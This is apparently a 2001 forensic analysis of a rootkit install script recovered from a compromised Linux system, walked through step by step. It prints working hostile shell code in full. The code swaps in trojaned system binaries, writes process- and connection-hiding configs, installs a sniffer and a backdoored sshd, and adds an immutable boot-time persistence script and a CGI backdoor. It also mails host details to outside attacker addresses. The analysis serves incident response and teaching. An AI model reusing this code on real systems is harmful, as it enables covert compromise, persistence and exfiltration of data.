
The install script

After a short examination of the recovered folder, I found that the file install (inode 2041) is very interesting.

install is a shell script that is executed after the system is compromised. It does, in order:

  1. Announces itself and checks whether make, gcc and sshd are present in their default locations.

    
    #!/bin/sh
    clear
    unset HISTFILE
    echo    "********* Instalarea Rootkitului A Pornit La Drum *********"
    echo    "********* Mircea SUGI PULA ********************************"
    echo    "********* Multumiri La Toti Care M-Au Ajutat **************" 
    echo    "********* Lemme Give You A Tip : **************************"
    echo    "********* Ignore everything, call your freedom ************"
    echo    "********* Scream & swear as much as you can ***************"
    echo    "********* Cuz anyway nobody will hear you and no one will *"
    echo    "********* Care about you **********************************"
    echo
    echo
    chown root.root *
    if [ -f /usr/bin/make ]; then
        echo "Are Make !"
    else
        echo "Nu Are Make !"
    fi
    if [ -f /usr/bin/gcc ]; then
        echo "Are Gcc !"
    else
        echo "Nu Are Gcc !"
    fi
    if [ -f /usr/sbin/sshd/ ]; then
        echo "Are Ssh !"
    else 
        echo "Nu Are Ssh !"
    fi
    

    Strangely, the script does not need make, gcc or sshd. It runs the tests only to inform the luser whether they are present. Note that the sshd test uses a trailing slash (/usr/sbin/sshd/), so "-f" fails even when sshd is installed, and the script always reports "Nu Are Ssh !".

  2. Installs trojaned versions of ifconfig, netstat, ps and top. Also installs a program called mkxfs.

    
    echo -n "* Inlocuim nestat ... alea alea "
    rm -rf /sbin/ifconfig
    mv ifconfig /sbin/ifconfig
    rm -rf /bin/netstat
    mv netstat /bin/netstat
    rm -rf /bin/ps
    mv ps /bin/ps
    rm -rf /usr/bin/top
    mv top /usr/bin/top
    cp -f mkxfs /usr/sbin/
    echo "* Gata..."
    echo -n "* Dev... "
    echo
    echo
    

  3. Creates the files /dev/rpm and /dev/last.

    
    touch /dev/rpm >/dev/rpm
    echo "3 sl2" >>/dev/rpm
    echo "3 sshdu" >>/dev/rpm
    echo "3 linsniffer" >>/dev/rpm
    echo "3 smurf" >>/dev/rpm
    echo "3 slice" >>/dev/rpm
    echo "3 mech" >>/dev/rpm
    echo "3 muh" >>/dev/rpm
    echo "3 bnc" >>/dev/rpm
    echo "3 psybnc" >> /dev/rpm
    touch /dev/last >/dev/last
    echo "1 193.231.139" >>/dev/last
    echo "1 213.154.137" >>/dev/last
    echo "1 193.254.34" >>/dev/last
    echo "3 48744" >>/dev/last
    echo "3 3666" >>/dev/last
    echo "3 31221" >>/dev/last
    echo "3 22546" >>/dev/last
    echo "4 48744" >>/dev/last
    echo "4 2222" >>/dev/last
    echo "* Gata"
    

    The file /dev/rpm looks like Linux Rootkit's (lrk) ps and top configuration file. The file /dev/last looks like lrk's netstat configuration file. This makes me think that the trojaned versions of ifconfig, netstat, ps and top are the same as the ones present in Linux Rootkit.

  4. Creates the folders /dev/ida/.drag-on and /dev/ida/".. " and installs, among other things, an sshd daemon and a port sniffer.

    
    echo "* Facem Director...Si Mutam Alea.. "
    mkdir -p /dev/ida/.drag-on
    mkdir -p /dev/ida/".. "
    echo "* Copiem ssh si alea"
    cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed \
    /dev/ida/.drag-on/
    cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed \
    /dev/ida/".. "
    rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
    touch /dev/ida/.drag-on/tcp.log
    touch /dev/ida/".. "/tcp.log
    

    Here's a description of the files installed:

    linsniffer       port sniffer
    logclear         script to delete the sniffer's log and restart linsniffer
    sense            sorts the output from LinSniffer
    sl2              DoS tool based on synk4 (my guess)
    mkxfs            sshd daemon with a backdoor
    s                sshd daemon configuration file
    ssh_host_key     sshd daemon host key
    ssh_random_seed  sshd daemon random seed

  5. Replaces /etc/inetd.conf and /etc/services with its own versions and sends inetd a HUP so the new configuration is read.

    
    cp -f inetd.conf /etc
    cp -f services /etc
    killall -HUP inetd
    echo 
    echo
    

    The new inetd.conf and services have been recovered as inodes 2044 and 2046, respectively, in the folder interestInodes.

  6. Deletes the real /usr/bin/lsattr and appends a line to /etc/rc.d/rc.sysinit so that /usr/bin/lsattr is run on every boot.

    
    echo
    echo "* Adaugam In Startup:) ..."
    rm -rf /usr/bin/lsattr
    echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
    echo >> /etc/rc.d/rc.sysinit
    

  7. Installs a shell script at /usr/bin/lsattr, makes it mode 500 and immutable (chattr +i, so a plain rm fails until the attribute is removed), then runs it once.

    
    cp -f lsattr /usr/bin/
    chmod 500 /usr/bin/lsattr
    chattr +i /usr/bin/lsattr
    /usr/bin/lsattr
    
    sleep 1
    

    The file lsattr has been recovered from inode 2045 in the folder interestInodes:

    
    #!/bin/sh
    cd /dev/ida/.drag-on
    ./mkxfs -f ./s
    ./linsniffer >> ./tcp.log &
    cd /
    

  8. Tries to install a CGI backdoor, last.cgi, in whichever of several common cgi-bin directories exists.

    
    if [ -d /home/httpd/cgi-bin ]
    then
    mv -f last.cgi /home/httpd/cgi-bin/
    fi
    
    if [ -d /usr/local/httpd/cgi-bin ]
    then
    mv -f last.cgi /usr/local/httpd/cgi-bin/
    fi
    
    if [ -d /usr/local/apache/cgi-bin ]
    then
    mv -f last.cgi /usr/local/apache/cgi-bin/
    fi
    
    if [ -d /www/httpd/cgi-bin ]
    then
    mv -f last.cgi /www/httpd/cgi-bin/
    fi
    
    if [ -d /www/cgi-bin ]
    then
    mv -f last.cgi /www/cgi-bin/
    fi
    

    The file last.cgi has been recovered from inode 2054 in the folder interestInodes.

  9. Sends an email to last@linuxmail.org and bidi_damm@yahoo.com containing information about the compromised host.

    
    echo "* Luam Informatiile dorite ..."
    echo "* Info : $(uname -a)" >> computer
    echo "* Hostname : $(hostname -f)" >> computer
    echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
    echo "* Uptime : $(uptime)" >> computer
    echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
    echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
    echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
    echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
    echo "* Spatiu Liber: $(df -h)" >> computer
    echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
    cat computer | mail -s "placinte" last@linuxmail.org
    cat computer | mail -s "roote" bidi_damm@yahoo.com
    

  10. Cleans up after itself.

    
    echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
    echo
    echo
    echo "* G A T A *"
    echo
    echo "* That Was Nice Last "
    cd /
    rm -rf last lk.tgz computer lk.tar.gz
    

I went to Romanian IRC channels to get the Romanian sentences translated into English, but all I could get was a lot of DCC offers for IRC worms/viruses. Well, it's a good way to know if your anti-virus is working... hi.


Guillaume Filion
2001-05-21